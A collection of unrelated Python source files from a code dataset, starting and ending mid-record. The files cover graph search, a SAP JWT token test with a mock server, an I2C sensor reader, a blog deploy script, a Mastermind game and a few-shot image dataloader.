self.open_nodes.put((0, root))\n \n self.terminals = 0\n self.non_terminals = 1\n self.visited = set()\n self.in_queue = {hash('')}\n self.counter = 0\n \n @property\n def length(self):\n return self.solution.depth\n \n @property\n def cost(self):\n return self.solution.cost\n \n @property\n def avg_branching(self):\n return (self.terminals + self.non_terminals - 1) / self.non_terminals\n\n # obter o caminho (sequencia de estados) da raiz ate um no\n def get_path(self,node):\n if node.parent == None:\n return [node.state]\n path = self.get_path(node.parent)\n path += [node.state]\n return path\n \n def get_plan(self, node):\n if node.parent == None:\n return ''\n plan = self.get_plan(node.parent)\n plan += node.movements + node.action\n return plan\n \n @property\n def plan(self):\n return self.get_plan(self.solution)\n \n async def search(self):\n while not self.open_nodes.empty():\n await asyncio.sleep(0)\n priority, node = self.open_nodes.get()\n \n if self.problem.goal_test(node.state):\n self.solution = node\n self.terminals = self.open_nodes.qsize()\n return True\n \n self.visited.add(node.hash_)\n self.in_queue.remove(node.hash_)\n self.non_terminals += 1\n\n for a, mov in self.problem.domain.actions(node):\n newstate = a.result\n \n state_hash = hash(str(sorted(newstate)) + str(a.args))\n \n if state_hash in self.visited or state_hash in self.in_queue:\n continue\n \n self.in_queue.add(state_hash)\n \n heuristica = self.problem.domain.heuristic(newstate, self.problem.goal)\n newnode = SearchNode(newstate, node, node.depth + 1, 1, \n heuristica, a.__class__.__name__.lower(), a.args, mov, self.counter, state_hash)\n 
self.open_nodes.put((heuristica, newnode))\n \n self.counter += 1\n \n return None\n \n def searchSync(self, limit=None):\n while not self.open_nodes.empty():\n priority, node = self.open_nodes.get()\n \n if self.problem.goal_test(node.state):\n self.solution = node\n self.terminals = self.open_nodes.qsize()\n return self.get_path(node)\n\n self.non_terminals += 1\n \n self.visited.add(node.hash_)\n self.in_queue.remove(node.hash_)\n \n for a, mov in self.problem.domain.actions(node):\n \n newstate = a.result\n \n state_hash = hash(str(sorted(newstate)) + str(a.args))\n \n if state_hash in self.visited or state_hash in self.in_queue:\n continue\n \n self.in_queue.add(state_hash)\n \n custo = node.cost + self.problem.domain.cost(node.state, a)\n heuristica = self.problem.domain.heuristic(newstate, self.problem.goal)\n newnode = SearchNode(newstate, node, node.depth + 1, custo, \n heuristica, a.__class__.__name__.lower(), a.args, mov, self.counter, state_hash)\n self.open_nodes.put((custo + heuristica, newnode))\n self.counter += 1\n return None\n","sub_path":"tree_search.py","file_name":"tree_search.py","file_ext":"py","file_size_in_byte":5824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
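The two drivers in the record above are best-first searches over a priority queue: `searchSync` orders nodes by `custo + heuristica` (classic A*, f = g + h), while the async `search` pushes by heuristic alone, i.e. greedy best-first. A self-contained sketch of the same A* ordering with `heapq`, on a hypothetical 1-D number-line domain rather than the Sokoban-style domain the record assumes:

```python
import heapq

def astar_1d(start, goal):
    """Tiny A* on the integer number line; h(n) = |goal - n| is admissible."""
    counter = 0  # insertion tie-breaker, like SearchNode.counter above
    frontier = [(abs(goal - start), 0, counter, start, [start])]
    visited = set()
    while frontier:
        f, g, _, state, path = heapq.heappop(frontier)
        if state == goal:
            return path
        if state in visited:
            continue
        visited.add(state)
        for nxt in (state - 1, state + 1):  # two "actions", unit cost each
            if nxt not in visited:
                counter += 1
                h = abs(goal - nxt)
                heapq.heappush(frontier, (g + 1 + h, g + 1, counter, nxt, path + [nxt]))
    return None

print(astar_1d(0, 3))  # [0, 1, 2, 3]
```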
+{"seq_id":"501923029","text":"# pylint: disable=missing-docstring,invalid-name,missing-docstring\nimport unittest\nfrom os import environ, path, devnull\nimport socket\nfrom time import sleep\nfrom subprocess import Popen\n\nfrom sap.xssec import jwt_validation_facade\n\nfrom sap import xssec\nfrom tests import uaa_configs\nfrom tests import jwt_payloads\nfrom tests.jwt_tools import sign\n\nTEST_SERVER_POLL_ATTEMPTS = 10\n\n\ndef get_free_tcp_port():\n tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcp.bind(('', 0))\n _, port = tcp.getsockname()\n tcp.close()\n return port\n\n\nflask_env = environ.copy()\n\nflask_env['FLASK_APP'] = path.join(path.dirname(\n path.abspath(__file__)), 'utils', 'uaa_mock.py')\nflask_port = str(get_free_tcp_port())\nflask_url = 'http://localhost:' + flask_port\n\n\nclass ReqTokenForClientTest(unittest.TestCase):\n DEVNULL = None\n flask_process = None\n\n @classmethod\n def setUpClass(cls):\n \"\"\" Test class static setup \"\"\"\n environ[\"SAP_EXT_JWT_ALG\"] = \"*\"\n\n cls.DEVNULL = open(devnull, 'w')\n cls.flask_process = Popen(['flask', 'run', '-p', flask_port, '-h', 'localhost'],\n env=flask_env, stdout=cls.DEVNULL, stderr=cls.DEVNULL)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n poll = 0\n\n while poll != TEST_SERVER_POLL_ATTEMPTS:\n try:\n sleep(1)\n poll += 1\n s.connect(('localhost', int(flask_port)))\n print('Test server is up!') # pylint: disable=superfluous-parens\n break\n except socket.error as e:\n if poll == TEST_SERVER_POLL_ATTEMPTS:\n print(\n 'Test server could not start!') # pylint: disable=superfluous-parens\n raise e\n s.close()\n\n jwt_validation_facade.ALGORITHMS = ['RS256', 'HS256']\n\n @classmethod\n def tearDownClass(cls):\n if cls.flask_process:\n cls.flask_process.terminate()\n if cls.DEVNULL:\n cls.DEVNULL.close()\n\n def _request_token_for_client_error(self, sec_context, url, error_message_end):\n service_credentials = {\n 'clientid': 'clientid',\n 'clientsecret': 'clientsecret',\n 'url': url\n }\n with self.assertRaises(RuntimeError) as ctx:\n sec_context.request_token_for_client(service_credentials, None)\n self.assertTrue(str(ctx.exception).endswith(error_message_end))\n\n def test_request_token_for_client_missing_uaa_user_scope(self):\n '''\n Test valid end-user token no attributes.\n request_token_for_client failure, scope uaa.user missing\n '''\n sec_context = xssec.create_security_context(\n sign(jwt_payloads.USER_TOKEN_NO_ATTR), uaa_configs.VALID['uaa'])\n self._request_token_for_client_error(\n sec_context, flask_url + '/500',\n 'JWT token does not include scope \"uaa.user\"')\n\n def test_req_client_for_user_401_error(self):\n sec_context = xssec.create_security_context(\n sign(jwt_payloads.USER_TOKEN_SCOPE_UAA_USER), uaa_configs.VALID['uaa'])\n expected_message = \\\n 'Bearer token invalid, requesting client does'\\\n ' not have grant_type=user_token or no scopes were granted.'\n\n self._request_token_for_client_error(\n sec_context, flask_url + '/401', expected_message)\n\n def test_req_client_for_user_500_error(self):\n sec_context = xssec.create_security_context(\n sign(jwt_payloads.USER_TOKEN_SCOPE_UAA_USER), uaa_configs.VALID['uaa'])\n self._request_token_for_client_error(\n sec_context, flask_url + '/500', 'HTTP status code: 500')\n\n def test_req_client_for_user(self):\n sec_context = xssec.create_security_context(\n sign(jwt_payloads.USER_TOKEN_SCOPE_UAA_USER), uaa_configs.VALID['uaa'])\n service_credentials = {\n 'clientid': 'clientid',\n 'clientsecret': 'clientsecret',\n 'url': 
flask_url + '/correct'\n }\n token = sec_context.request_token_for_client(service_credentials, None)\n self.assertEqual(token, 'access_token')\n","sub_path":"tests/test_req_token.py","file_name":"test_req_token.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"93510454","text":"# Modules\nimport smbus\nimport time\nimport numpy as np\n\ndef get_sht3x_data():\n\n bus = smbus.SMBus(1)\n\n # SHT3x hex adres\n SHT3x_ADDR\t\t= 0x44\n SHT3x_SS\t\t= 0x2C\n SHT3x_HIGH\t\t= 0x06\n SHT3x_READ\t\t= 0x00\n\n # MS to SL\n bus.write_i2c_block_data(SHT3x_ADDR,SHT3x_SS,[0x06])\n time.sleep(0.2)\n\n # Read out data\n data = bus.read_i2c_block_data(SHT3x_ADDR,SHT3x_READ,6)\n\n # Devide data into counts Temperature\n t_data = data[0] << 8 | data[1]\n\n # Devide data into counts Humidity\n h_data = data[3] << 8 | data[4]\n\n # Convert counts to Temperature/Humidity\n Humidity = 100.0*np.float(h_data)/65535.0\n Temperature = -45.0 + 175.0*np.float(t_data)/65535.0\n\n return Humidity, Temperature\n","sub_path":"slave2018/read_sht3x.py","file_name":"read_sht3x.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"619959125","text":"import subprocess\nimport sys\nimport os\n\nblog_base = ''\n\n\ndef exec(cmd, timeout=5):\n print(cmd)\n ret = subprocess.run(\n cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n # encoding=\"utf-8\",\n timeout=timeout)\n if ret.returncode != 0:\n raise Exception(ret.stderr.decode(\"utf8\"))\n\n\ndef deploy():\n blog_path = \"public\"\n old_blog_path = \"public_old\"\n blog_tool_jar_path = \"tool.jar\"\n repo_path = \"repo\"\n\n build_path = repo_path + \"/build\"\n svg_base = build_path + \"/svg\"\n\n src_path = repo_path + \"/src\"\n article_base = src_path + \"/article\"\n md_base = src_path + \"/md\"\n db_path = src_path + \"/service/db.js\"\n\n # cdToBlogBase\n os.chdir(blog_base)\n # deleteArticles\n exec(\"rm -rf \" + article_base)\n # deleteArticleDb\n exec(\"rm -rf \" + db_path)\n # pullBlogSource\n exec(\"cd \" + repo_path + \" git pull\")\n # parseMarkdown\n exec(\"java -jar \" + blog_tool_jar_path + \" \" + md_base, 180)\n # mvArticlesToRepo\n exec(\"mv article \" + article_base)\n # mvArticleDbToRepo\n exec(\"mv db.js \" + db_path)\n # runBuild\n exec(\"cd \" + repo_path + \" && npm run build\", 120)\n # mvSvgToBuild\n exec(\"mv svg \" + svg_base)\n # rmBlogOld\n exec(\"rm -rf \" + old_blog_path)\n # renameBlogToBlogOld\n exec(\"mv \" + blog_path + \" \" + old_blog_path)\n # renameBuildToBlog\n exec(\"mv \" + build_path + \" \" + blog_path)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"Blog base should be specified\")\n exit(-1)\n blog_base = sys.argv[1]\n deploy()\n\n","sub_path":"deployer/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"281156333","text":"import zipfile, urllib, csv, os, codecs\n\ndef get_items(url):\n filename, headers = urllib.urlretrieve(url)\n try:\n with zipfile.ZipFile(filename) as zf:\n csvfiles = [name for name in zf.namelist()\n if name.endswith('.csv')]\n for item in csvfiles:\n with zf.open(item) as source:\n reader = csv.DictReader(codecs.getreader('iso-8859-1')(source))\n for line in reader:\n yield line\n finally:\n os.unlink(filename)","sub_path":"dockerized-gists/5295600/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"465008563","text":"while True:\n ''' interface gedeelte'''\n print('Dit zijn de keuzes:'\n '\\n=======================================================================')\n print( 'Optie 1: De computer kiest een patroon en jij gokt'\n '\\nOptie 2: Kies zelf een patroon en de computer gokt, implementatie 1'\n '\\nOptie 3: Kies zelf een patroon en de computer gokt, implementatie 2'\n '\\nOptie 4: Kies zelf een patroon en de computer gokt, eige implementatie'\n '\\n======================================================================='\n '\\nKies 1, 2, 3 of 4')\n\n optie = input(('Maak een keuze:'))\n\n ''' Optie 1'''\n if optie == '1':\n import random\n from src import functies as func\n print('\\n''De kleuren waaruit je kan kiezen zijn: Rood(R), Blauw(B), Groen(GR), Geel(G), Oranje(O) en Paars(P)'\n '\\n')\n kleuren = ['R', 'B', 'Gr', 'G', 'O', 'P']\n PCcode = []\n\n for i in range(4):\n PCcode.append(random.choice(kleuren))\n\n print(PCcode)\n for i in range(1, 11):\n Gokken = []\n while len(Gokken) < 4:\n PlGok = input('Vul jouw gok in met spaties tussen de kleuren:')\n Gokken = PlGok.split(' ')\n\n print(PCcode)\n print('zwart:', func.pinchecker(Gokken, PCcode)[1],\n '\\nwit:', func.pinchecker(Gokken, PCcode)[0])\n\n if func.pinchecker(Gokken, PCcode)[1] == 4:\n print('Je hebt binnen 10 zetten gewonnen!')\n break\n\n print('Helaas, je beurten zijn op. De code was,', PCcode, '\\nNog een keertje proberen?')\n\n\n '''Optie 2'''\n if optie == '2':\n import random\n from src import functies as func\n\n\n\n\n\n\n","sub_path":"Mastermind.py","file_name":"Mastermind.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"534427335","text":"#policy: emergency.py\n# include all the handler for emergency \n# such as data_collect error------- switch to utility (no policy decision can be made)\n\nimport globalValue\nimport sys, copy\nsys.path.append(globalValue.top_path())\nfrom commit import commit_analysis\n\n# switch to utility, when serious errors happen\ndef turn_on_utility():\n open_port = copy.copy(globalValue.ipdu_utility_port())\n close_port = copy.copy(globalValue.ipdu_green_port())\n commit_analysis.ipdu_open_analysis(open_port)\n commit_analysis.ipdu_close_analysis(close_port)\n exit(0)\n","sub_path":"policy/emergency.py","file_name":"emergency.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"272453883","text":"\n\nfrom xai.brain.wordbase.nouns._smudge import _SMUDGE\n\n#calss header\nclass _SMUDGING(_SMUDGE, ):\n\tdef __init__(self,): \n\t\t_SMUDGE.__init__(self)\n\t\tself.name = \"SMUDGING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"smudge\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_smudging.py","file_name":"_smudging.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"117978365","text":"#! /usr/bin/env python3\n#\n# Copyright (c) 2022 Intel Corporation\n#\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\"\nAllocation utilities\n--------------------\n\nInitialize with:\n\n>>> import tcfl.allocation\n>>> tcfl.allocation.subsystem_initialize()\n\n(note it takes care of initializing its dependencies)\n\nThere is no asynchronous method to initialize this module.\n\"\"\"\n\nimport logging\n\nimport tcfl\n\nlogger = logging.getLogger(\"tcfl.allocation\")\n\n_subsystem_setup = False\n\n\ndef _server_allocs_get(_server_name: str, self: tcfl.server_c, username):\n try:\n r = self.send_request(\"GET\", \"allocation/\")\n except (Exception, tcfl.ttb_client.requests.HTTPError) as e:\n self.log.error(\"%s\", e)\n return {}\n\n # So, r is a dictionary { \"ALLOCID\": { ALLOCDATA } }\n #\n # ALLOCDATA is a dictionary { \"FIELD1\": VALUE1 } and among the fields there is:\n #\n # - creator: who created it\n # - user: who is the allocation assigned to\n\n if username:\n # filter here, as we can translate the username 'self' to the\n # user we are logged in as in the server\n filtered_r = {}\n if username == \"self\":\n username = self.logged_in_username()\n\n def _alloc_filter_by_user(allocdata, username):\n if username != None \\\n and username != allocdata.get('creator', None) \\\n and username != allocdata.get('user', None):\n return False\n return True\n\n for allocid, allocdata in r.items():\n if _alloc_filter_by_user(allocdata, username):\n filtered_r[allocid] = allocdata\n else:\n self.log.info(\"alloc-ls: filtered out %s: %s\",\n self.url, allocdata)\n\n return filtered_r\n\n return r\n\n\ndef ls(spec, username: str, parallelization_factor: int = -4,\n traces: bool = True):\n\n import tcfl.servers\n\n return tcfl.servers.run_fn_on_each_server(\n tcfl.server_c.servers, _server_allocs_get, username,\n parallelization_factor = parallelization_factor,\n traces = traces)\n\n\n\ndef subsystem_setup(*args, **kwargs):\n \"\"\"\n Initialize the allocation management system in a synchronous way\n\n Same arguments as :func:`tcfl.servers.subsystem_setup`\n\n Note this will initialize all the modules it requires\n (:mod:`tcfl.config`) if not already initialized.\n \"\"\"\n global _subsystem_setup\n if _subsystem_setup:\n return\n tcfl.servers.subsystem_setup(*args, **kwargs)\n logger.info(\"setting up allocation subsystem\")\n _subsystem_setup = True\n","sub_path":"tcfl/allocation.py","file_name":"allocation.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"596865374","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nfrom azure.cli.core import AzCommandsLoader\nfrom knack.help_files import helps\n\nhelps['find'] = \"\"\"\n type: command\n short-summary: I'm an AI robot, my advice is based on our Azure documentation as well as the usage patterns of Azure CLI and Azure ARM users. Using me improves Azure products and documentation.\n examples:\n - name: Give me any Azure CLI command or group and I’ll show the most popular commands and parameters.\n text: |\n az find 'az [group]' : az find 'az storage'\n az find 'az [group] [command]' : az find 'az monitor activity-log list'\n - name: You can also enter a search term, and I'll try to help find the best commands.\n text: |\n az find '[query]' : az find 'arm template'\n\"\"\"\n\n\nclass FindCommandsLoader(AzCommandsLoader):\n\n def __init__(self, cli_ctx=None):\n from azure.cli.core.commands import CliCommandType\n\n process_query_custom = CliCommandType(\n operations_tmpl='azext_find.custom#{}')\n super(FindCommandsLoader, self).__init__(\n cli_ctx=cli_ctx, custom_command_type=process_query_custom)\n\n def load_command_table(self, _):\n with self.command_group('') as g:\n g.custom_command('find', 'process_query')\n return self.command_table\n\n def load_arguments(self, _):\n with self.argument_context('find') as c:\n c.positional('cli_term', help='An Azure CLI command or group for which you need an example.')\n\n\nCOMMAND_LOADER_CLS = FindCommandsLoader\n","sub_path":"src/find/azext_find/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"7567190","text":"file = open('2020/inputs/input-07.txt')\nf = [x.strip()[:-1].split(' bags contain ') for x in file.readlines()]\nbags = {}\n\nfor line in f:\n line[1] = line[1].split(', ')\n if line[1][0] != 'no other bags':\n for i in range(len(line[1])):\n line[1][i] = (int(line[1][i][0]), line[1][i][1:].strip().replace(' bags', '').replace(' bag', ''))\n bags[line[0]] = line[1]\n else:\n bags[line[0]] = [(0, 'none')]\n\n\ndef is_bag1_in_bag2(bag1, bag2):\n ans = 0\n for b in bags[bag2]:\n if b[0] == 0:\n return False\n if b[1] == bag1:\n return True\n if is_bag1_in_bag2(bag1, b[1]):\n return True\n\n\ndef how_many_bags_contain(file, bag):\n ans = 0\n for b in file:\n if is_bag1_in_bag2(bag, b[0]):\n ans += 1\n return ans\n\n\ndef count_bags_inside(file, bag):\n ans = 0\n for b in bags[bag]:\n if b[0] > 0:\n count = count_bags_inside(file, b[1])\n ans += b[0] * count + b[0]\n return ans\n\n\nprint(how_many_bags_contain(f, 'shiny gold'))\nprint(count_bags_inside(f, 'shiny gold'))\n\nfile.close()\n","sub_path":"2020/day-07.py","file_name":"day-07.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"141581695","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef kostka(n):\n return [(np.random.randint(6)+1)+(np.random.randint(6)+1) for x in range(n)]\n\nlista=kostka(50)\nprint(lista)\nplt.hist(lista, bins=10, facecolor=\"red\", alpha=0.75)\nplt.xlabel('Wartości')\nplt.ylabel('Ilość rzutów o danej sumie')\nplt.title('Histogram')\nplt.grid(True)\nplt.show()\n\n","sub_path":"cw10_zad8.py","file_name":"cw10_zad8.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"349763212","text":"import bpy\nfrom rendering.ThemeManager import ThemeManager\nfrom rendering.ThemeConfiguration import configuration as tc\n\ntm = ThemeManager(tc)\n\n# Assets are added together with a parent object\n# with the instance name from the configuration.\n# Position / scale the asset using its parent.\n# Asset will be deleted on reset_scene,\n# but do save the file maintaining the parent.\n# At the next run, the asset will be positioned within the parent again.\ndef load_and_transform(instance_name, model_name, frame, object_prefix=\"Layer\"):\n with bpy.data.libraries.load(\n './models/'+model_name+'.blend', link=False) as (data_src, data_dst):\n data_dst.objects = [name for name in data_src.objects if name.startswith(object_prefix)]\n\n scene = bpy.context.scene\n material_name = tm.get_material_for(model_name, frame)\n mat = bpy.data.materials.get(material_name) if material_name is not None else None\n procedural_instance_name = instance_name+\"_procedural\"\n for obj in data_dst.objects:\n obj.name = procedural_instance_name+\"_\"+obj.name\n if mat is not None: obj.data.materials.append(mat)\n scene.objects.link(obj)\n if instance_name in bpy.context.scene.objects.keys():\n parent = bpy.context.scene.objects[instance_name]\n obj.parent = parent\n else:\n bpy.ops.object.empty_add(type='CUBE',location=(0,0,0))\n parent = bpy.context.scene.objects.active\n parent.name = instance_name\n obj.parent = parent\n parent.select = False\n\n\n\nclass ModelsManager():\n def __init__(self, configuration):\n self.configuration = configuration\n\n def pinocchio(self, frame):\n for key in self.configuration.keys():\n model_config = self.configuration[key]\n frame_config = max(\n filter(\n lambda k: k <= frame,\n map(lambda k: int(k), model_config.keys())\n )\n )\n model_frame_config = model_config[str(frame_config)]\n if model_frame_config is not None:\n load_and_transform(key, model_frame_config, frame)\n","sub_path":"rendering/ModelsManager.py","file_name":"ModelsManager.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"326675298","text":"from __future__ import print_function\nimport json\n\nfrom prettytable import ALL, PrettyTable\nimport __main__\nfrom .collector import services, hunters, vulnerabilities, handler, services_lock, vulnerabilities_lock\nimport requests\nimport logging\nEVIDENCE_PREVIEW = 40\nMAX_TABLE_WIDTH = 20\n\nclass BaseReporter(object):\n def get_nodes(self):\n nodes = list()\n node_locations = set()\n services_lock.acquire()\n for service in services:\n node_location = str(service.host)\n if node_location not in node_locations:\n nodes.append({\"type\": \"Node/Master\", \"location\": str(service.host)})\n node_locations.add(node_location)\n services_lock.release()\n return nodes\n\n def get_services(self):\n services_lock.acquire()\n services_data = [{\"service\": service.get_name(),\n \"location\": \"{}:{}{}\".format(service.host, service.port, service.get_path()),\n \"description\": service.explain()}\n for service in services]\n services_lock.release()\n return services_data\n\n def get_vulnerabilities(self):\n vulnerabilities_lock.acquire()\n vulnerabilities_data = [{\"location\": vuln.location(),\n \"category\": vuln.category.name,\n \"severity\": vuln.get_severity(),\n \"vulnerability\": vuln.get_name(),\n \"description\": vuln.explain(),\n \"version\": str(vuln.evidence)}\n for vuln in vulnerabilities]\n vulnerabilities_lock.release()\n return vulnerabilities_data\n\n def get_hunter_statistics(self):\n hunters_data = list()\n for hunter, docs in hunters.items():\n if not Discovery in hunter.__mro__:\n name, doc = hunter.parse_docs(docs)\n hunters_data.append({\"name\": name, \"description\": doc, \"vulnerabilities\": hunter.publishedVulnerabilities})\n return hunters_data\n\nclass PlainReporter(BaseReporter):\n def get_report(self):\n output = \"\"\n\n vulnerabilities_lock.acquire()\n vulnerabilities_len = len(vulnerabilities)\n vulnerabilities_lock.release()\n\n hunters_len = len(hunters.items())\n\n services_lock.acquire()\n services_len = len(services)\n services_lock.release()\n\n if services_len:\n output += self.nodes_table()\n output += self.services_table()\n if vulnerabilities_len:\n output += self.vulns_table()\n else:\n output += \"\\nNo vulnerabilities were found\"\n else:\n print(\"\\nKube Hunter couldn't find any clusters\")\n return output\n\n def nodes_table(self):\n nodes_table = PrettyTable([\"Type\", \"Location\"], hrules=ALL)\n nodes_table.align = \"l\"\n nodes_table.max_width = MAX_TABLE_WIDTH\n nodes_table.padding_width = 1\n nodes_table.sortby = \"Type\"\n nodes_table.reversesort = True\n nodes_table.header_style = \"upper\"\n id_memory = list()\n services_lock.acquire()\n for service in services:\n if service.event_id not in id_memory:\n nodes_table.add_row([\"Node/Master\", service.host])\n id_memory.append(service.event_id)\n nodes_ret = \"\\n\\nNodes\\n{}\\n\".format(nodes_table)\n services_lock.release()\n return nodes_ret\n\n def services_table(self):\n services_table = PrettyTable([\"Service\", \"Location\"], hrules=ALL)\n services_table.align = \"l\"\n services_table.max_width = MAX_TABLE_WIDTH\n services_table.padding_width = 1\n services_table.sortby = \"Service\"\n services_table.reversesort = True\n services_table.header_style = \"upper\"\n services_lock.acquire()\n for service in services:\n services_table.add_row([service.get_name(), \"{}:{}{}\".format(service.host, service.port, service.get_path())])\n detected_services_ret = \"\\nDetected Services\\n{}\\n\".format(services_table)\n services_lock.release()\n return 
detected_services_ret\n\n def vulns_table(self):\n column_names = [\"Location\", \"Category\", \"Vulnerability\", \"Description\", \"Evidence\"]\n vuln_table = PrettyTable(column_names, hrules=ALL)\n vuln_table.align = \"l\"\n vuln_table.max_width = MAX_TABLE_WIDTH\n vuln_table.sortby = \"Category\"\n vuln_table.reversesort = True\n vuln_table.padding_width = 1\n vuln_table.header_style = \"upper\"\n\n vulnerabilities_lock.acquire()\n for vuln in vulnerabilities:\n row = [vuln.location(), vuln.category.name, vuln.get_name(), vuln.explain()]\n evidence = str(vuln.evidence) #if len(str(vuln.evidence)) > EVIDENCE_PREVIEW else str(vuln.evidence)\n row.append(evidence)\n vuln_table.add_row(row)\n vulnerabilities_lock.release()\n return \"\\nVulnerabilities\\n{}\\n\".format(vuln_table)\n\n def send_data(self):\n USER_TOKEN = __main__.email.get_email()\n URL = \"http://hotsix.kro.kr/re_result.php\"\n services_lock.acquire()\n for service in services:\n node_data = {'chk':'1','token' : USER_TOKEN, 'Type_1' : 'Node/Master', 'Location_1' : service.host}\n res = requests.post(URL, data=node_data)\n for service in services:\n location_2 = str(service.host) + ':' + str(service.port) + str(service.get_path())\n service_data = {'chk':'2','token' : USER_TOKEN, 'Service_2' : service.get_name(), 'Location_2' : location_2}\n res = requests.post(URL, data=service_data)\n services_lock.release()\n\n vulnerabilities_lock.acquire()\n for vuln in vulnerabilities:\n vuln_data = {'chk':'3','token' : USER_TOKEN, 'Location_3' : vuln.location(), 'Category_3' : str(vuln.category.name), 'Vulnerability_3': vuln.get_name(), 'Description_3' : vuln.explain(), 'Evidence_3' : vuln.evidence}\n res = requests.post(URL, data=vuln_data)\n\n vulnerabilities_lock.release()\n plus=\"=\"*len(USER_TOKEN)\n print(\"\\x1b[1;34m\\n==============================================================================={}\\x1b[1;m\".format(plus))\n print(\"\\x1b[1;34mIf you confirm Kube-Six report, Click This ==> http://hotsix.kro.kr/result.php?{}\\x1b[1;m\".format(USER_TOKEN))\n print(\"\\x1b[1;34m==============================================================================={}\\x1b[1;m\".format(plus))\n","sub_path":"src/modules/report/plain.py","file_name":"plain.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"272571868","text":"from flask_wtf import FlaskForm\nfrom wtforms import StringField, FloatField, IntegerField, BooleanField, SelectField\nfrom wtforms.validators import InputRequired, Length, NumberRange, URL, Optional\n\nclass AddPetForm(FlaskForm):\n \"\"\"Form for adding a pet\"\"\"\n\n pet_name=StringField('Pet Name', validators=[InputRequired()])\n species=SelectField('Species', choices=[(\"cat\", \"Cat\"), (\"dog\", \"Dog\"), (\"porcupine\", \"Porcupine\")])\n photo_url=StringField('Photo URL', validators=[Optional(), URL()])\n age=IntegerField('Age', validators=[Optional(), NumberRange(min=0, max=30)])\n notes=StringField('Notes', validators=[Optional(), Length(min=10)])\n\n\n\n\nclass EditPetForm(FlaskForm):\n \"\"\"Form for editing a pet\"\"\"\n\n photo_url=StringField('Photo URL', validators=[Optional(), URL()])\n notes=StringField('Notes', validators=[Optional(), Length(min=10)])\n available=BooleanField('Available')","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"411324893","text":"import argparse\nimport pickle as pk\nimport numpy as np\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_path\", required=True)\n args = parser.parse_args()\n print(args)\n\nloaded = pk.load(open('{}_accs_ROI.pkl'.format(args.input_path), 'rb'))\nmean_subj_acc_across_folds = loaded.mean(0)\nprint(\"Mean Accuracy Across Folds:\")\nfor i in range(len(mean_subj_acc_across_folds)):\n print(\"{}: {}\".format(i, mean_subj_acc_across_folds[i]))","sub_path":"print_mean_accuracy.py","file_name":"print_mean_accuracy.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"599874831","text":"# Dataloader of Gidaris & Komodakis, CVPR 2018\n# Adapted from:\n# https://github.com/gidariss/FewShotWithoutForgetting/blob/master/dataloader.py\nfrom __future__ import print_function\n\nimport os\nimport os.path\nimport numpy as np\nimport random\nimport pickle\nimport json\nimport math\n\nimport torch\nimport torch.utils.data as data\nimport torchvision\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nimport torchnet as tnt\n\nimport h5py\n\nfrom PIL import Image\nfrom PIL import ImageEnhance\n\nfrom pdb import set_trace as breakpoint\n\n\n# Set the appropriate paths of the datasets here.\n_FC100_DATASET_DIR = '/mnt/cube/datasets/few-shot/FC100'\n\ndef buildLabelIndex(labels):\n label2inds = {}\n for idx, label in enumerate(labels):\n if label not in label2inds:\n label2inds[label] = []\n label2inds[label].append(idx)\n\n return label2inds\n\ndef load_data(file):\n try:\n with open(file, 'rb') as fo:\n data = pickle.load(fo)\n return data\n except:\n with open(file, 'rb') as f:\n u = pickle._Unpickler(f)\n u.encoding = 'latin1'\n data = u.load()\n return data\n\nclass FC100(data.Dataset):\n def __init__(self, phase='train', do_not_use_random_transf=False):\n\n assert(phase=='train' or phase=='val' or phase=='test')\n self.phase = phase\n self.name = 'FC100_' + phase\n\n print('Loading FC100 